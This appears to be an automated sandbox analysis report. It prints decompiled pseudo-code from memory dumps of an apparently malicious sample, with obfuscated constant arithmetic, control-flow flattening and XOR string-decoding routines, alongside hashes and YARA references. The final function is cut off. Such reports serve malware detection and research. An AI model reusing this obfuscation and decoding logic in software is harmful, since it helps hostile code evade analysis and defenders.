Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00225A61, Relevance: 2.7, Strings: 2, Instructions: 155
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00225A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0021602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E00229AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E002176F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E00224F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E00211C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}

0x00225a6b
0x00225a72
0x00225a74
0x00225a7b
0x00225a82
0x00225a89
0x00225a8b
0x00225a90
0x00225a98
0x00225a9b
0x00225aa2
0x00225aaa
0x00225aaf
0x00225abc
0x00225acf
0x00225ad4
0x00225ada
0x00225ae2
0x00225aea
0x00225af7
0x00225afa
0x00225b06
0x00225b0e
0x00225b11
0x00225b15
0x00225b1d
0x00225b2a
0x00225b2e
0x00225b36
0x00225b3b
0x00225b43
0x00225b4b
0x00225b53
0x00225b5b
0x00225b63
0x00225b6b
0x00225b73
0x00225b7b
0x00225b83
0x00225b8b
0x00225b93
0x00225b9b
0x00225ba3
0x00225bab
0x00225bb3
0x00225bbb
0x00225bc0
0x00225bc8
0x00225bd5
0x00225bd9
0x00225be1
0x00225be9
0x00225bf1
0x00225bf9
0x00225c01
0x00225c05
0x00225c0d
0x00225c15
0x00225c1d
0x00225c25
0x00225c25
0x00225c33
0x00225cd1
0x00225cd6
0x00225cac
0x00225cb0
0x00225cb8
0x00000000
0x00225cb8
0x00225c3f
0x00225c9d
0x00225ca5
0x00000000
0x00225cab
0x00225c43
0x00000000
0x00225d11
0x00225c4f
0x00225c57
0x00000000
0x00225c5d
0x00225c5d
0x00000000
0x00225c5d
0x00225d1c
0x00225d1c
0x00225d1c
0x00225c76
0x00225c7b
0x00225c7d
0x00225c83
0x00225c89
0x00000000
0x00225c89
0x00000000
0x00225c83
0x00225cdb
0x00225ce0
0x00225cea
0x00225cf3
0x00000000
0x00225cec
0x00225cec
0x00000000
0x00225cec
0x00000000
0x00225cf5
0x00225cf5
0x00000000

Strings

gG, xrefs: 00225A90
4., xrefs: 00225B7B

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: 4.$gG
API String ID: 2962429428-791606841
Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction ID: 3700c3f49fe487f2f93b710e65cd829d9f9a8d722b5db0f69df621e55a8ad0b1
Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
Instruction Fuzzy Hash: C761CD71118751ABD768CF64D88985FBBE0FBC4318F104A1DF186962A0D7B9CA58CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0021B112, Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0021B112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x22ca2c; // 0x558300
							_t82 = _t97 + 0x230; // 0x680053
							return E00216636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E00223E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E00220ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}

0x0021b118
0x0021b11f
0x0021b127
0x0021b12c
0x0021b134
0x0021b13c
0x0021b144
0x0021b149
0x0021b151
0x0021b162
0x0021b16b
0x0021b183
0x0021b188
0x0021b18e
0x0021b196
0x0021b19e
0x0021b1b3
0x0021b1b4
0x0021b1b8
0x0021b1c0
0x0021b1c8
0x0021b1d0
0x0021b1d8
0x0021b1e0
0x0021b1e5
0x0021b1ed
0x0021b1f5
0x0021b1fd
0x0021b205
0x0021b20d
0x0021b215
0x0021b223
0x0021b227
0x0021b233
0x0021b233
0x0021b239
0x0021b2ce
0x0021b2d8
0x00000000
0x0021b2e3
0x0021b241
0x0021b25b
0x0021b262
0x00000000
0x0021b262
0x0021b249
0x00000000
0x00000000
0x0021b24b
0x0021b24b
0x0021b266
0x0021b272
0x0021b27a
0x0021b294
0x0021b2a8
0x0021b2a8
0x0021b2ac
0x0021b2ae
0x00000000
0x00000000
0x0021b299
0x0021b29d
0x0021b2a5
0x0021b2a5
0x0021b2a5
0x00000000
0x0021b2a5
0x0021b29f
0x0021b29f
0x0021b29f
0x0021b2a3
0x0021b2b2
0x0021b2b5
0x0021b2b5
0x00000000
0x0021b2b5
0x00000000
0x0021b2a3
0x00000000
0x0021b2b7
0x0021b2b7
0x0021b2b7
0x00000000

Strings

W$, xrefs: 0021B215
B, xrefs: 0021B266

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: B$W$
API String ID: 0-584637061
Opcode ID: 29aa2a29d6c2a9b39b709ec106ca2ecfe74b04adb2bd5cfb9d00613faa1d81a3
Instruction ID: f37635b114ffebd4cc8ed96a4b2e5b7aae859236a55273f67217eefd180fc785
Opcode Fuzzy Hash: 29aa2a29d6c2a9b39b709ec106ca2ecfe74b04adb2bd5cfb9d00613faa1d81a3
Instruction Fuzzy Hash: 9C4187715183428BD715CF20E58959FBBF1FBD8758F104A1EF489662A0D7B48A8E8F83

Uniqueness

Uniqueness Score: -1.00%

Function 002231E2, Relevance: 2.6, Strings: 2, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002231E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E00211210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E0022375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}

0x002231f0
0x002231f3
0x002231fa
0x00223201
0x00223208
0x00223214
0x00223219
0x0022321e
0x00223225
0x0022322c
0x00223230
0x00223237
0x0022323e
0x00223245
0x0022324c
0x00223253
0x0022325a
0x00223261
0x00223264
0x0022326b
0x00223272
0x00223276
0x0022327d
0x00223281
0x00223288
0x0022328f
0x00223296
0x0022329d
0x002232a7
0x002232aa
0x002232b3
0x002232b7
0x002232be
0x002232c5
0x002232cc
0x002232d0
0x002232d7
0x002232de
0x002232e2
0x002232e9
0x002232f0
0x002232f7
0x002232fb
0x00223302
0x00223314
0x00223321
0x00223323
0x00223330
0x00223332
0x00223338
0x0022333e
0x00000000
0x00000000
0x00223340
0x00000000
0x0022333e
0x00223342
0x00223344
0x00223344
0x00223348
0x0022336d
0x00223372
0x0022337c

Strings

`Zye, xrefs: 00223201
J5, xrefs: 002232E2

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: `Zye$J5
API String ID: 0-1569392922
Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction ID: 3c27ee7420a9c9e056ff5ce59f48ba119304f37b6c042d44fc55eceda484e325
Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
Instruction Fuzzy Hash: 4C4113B1C1021DEBDF49CFA0D94A9EEBBB5FB04304F108199E111B62A0D7B94B54CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0022889D, Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0022889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E0021602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00218736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}

0x002288a4
0x002288a9
0x002288aa
0x002288af
0x002288b7
0x002288ba
0x002288be
0x002288c2
0x002288ca
0x002288d2
0x002288da
0x002288e8
0x002288ed
0x002288f1
0x002288f9
0x00228901
0x0022890f
0x00228912
0x00228916
0x0022891e
0x00228922
0x00228925
0x00228927
0x0022892b
0x0022892f
0x0022893f
0x0022894a
0x00228959
0x0022895b
0x00228963
0x0022896a
0x0022897b
0x00228980
0x00228982
0x00228986
0x00228986
0x00228988
0x0022898b
0x00228990
0x00228998
0x0022899e
0x002289a2
0x002289ab
0x002289ac
0x002289b3
0x002289b7
0x002289bb
0x002289bb
0x002289c5
0x002289c5
0x002289d2

Strings

{K, xrefs: 00228916
Q`, xrefs: 002288CA

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Q`${K
API String ID: 0-3942002812
Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction ID: 2f0c16217c6bfb0e0b17cca52a12c87e22109139a1eec1fc33e4caad4ec4ed69
Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction Fuzzy Hash: F931CC72A087128FD314DF29C48456BF7E0FF88318F414B2DE489A7250DB74E94ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 0022878F, Relevance: 2.6, Strings: 2, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0022878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E0021602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00218736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}

0x00228799
0x0022879a
0x0022879f
0x002287a0
0x002287a5
0x002287ad
0x002287ad
0x002287b0
0x002287b8
0x002287c0
0x002287c8
0x002287d0
0x002287d8
0x002287e0
0x002287e8
0x002287f0
0x002287f8
0x002287fc
0x002287ff
0x00228801
0x00228805
0x00228809
0x00228819
0x00228824
0x00228832
0x00228834
0x0022883c
0x00228844
0x00228846
0x00228857
0x0022885c
0x0022885e
0x00228862
0x00228862
0x00228864
0x00228867
0x00228869
0x00228870
0x00228873
0x00228876
0x00228879
0x0022887f
0x00228880
0x00228883
0x00228887
0x00228887
0x00228890
0x00228890
0x0022889c

Strings

j, xrefs: 002287E0
5Ur, xrefs: 002287D8

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5Ur$j
API String ID: 0-2435424154
Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction ID: c89071bc46070dfcc5730c1f159e730a9f9d10a3727467112d5f0760b5299fe9
Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction Fuzzy Hash: 4731AB72A093128FD314CF29C88545BFBE0EF98714F854B5DE98AA7251C734E90ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00229586, Relevance: 2.6, Strings: 2, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00229586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x22c860);
					_push(_v20);
					_t80 = E0022878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00226965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00222025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

0x0022958c
0x00229590
0x00229597
0x0022959e
0x002295a2
0x002295a6
0x002295ad
0x002295b4
0x002295bb
0x002295c2
0x002295cf
0x002295d6
0x002295dd
0x002295e6
0x002295ed
0x002295f0
0x002295f7
0x002295fe
0x00229605
0x0022960c
0x00229613
0x0022961a
0x00229621
0x00229628
0x0022962f
0x00229636
0x0022963d
0x00229644
0x0022964b
0x0022964f
0x00229656
0x00229661
0x00229668
0x0022966b
0x0022966f
0x00229679
0x0022967c
0x0022967e
0x00229681
0x00229686
0x0022968f
0x00229694
0x00229697
0x00229699
0x002296a1
0x002296ab
0x002296ad
0x002296ad
0x002296ba
0x002296c1
0x002296c8

Strings

I, xrefs: 002295A6
4, xrefs: 00229628

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 4$I
API String ID: 0-2585635819
Opcode ID: ad01b7761685233b2a238980b0e4192823cdc74a5d83c7af8cbe570b1e42dd94
Instruction ID: f104e91df8f47863da53d3aa175d2fc8d07f53b786e8ad6c9e2c9f037006c388
Opcode Fuzzy Hash: ad01b7761685233b2a238980b0e4192823cdc74a5d83c7af8cbe570b1e42dd94
Instruction Fuzzy Hash: 5E4132B1D0021AEBEF04CFE1D94A6EEBBB0FB44314F208158D411B6290C3B9AB55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00217998, Relevance: 2.6, Strings: 2, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00217998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E0021602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
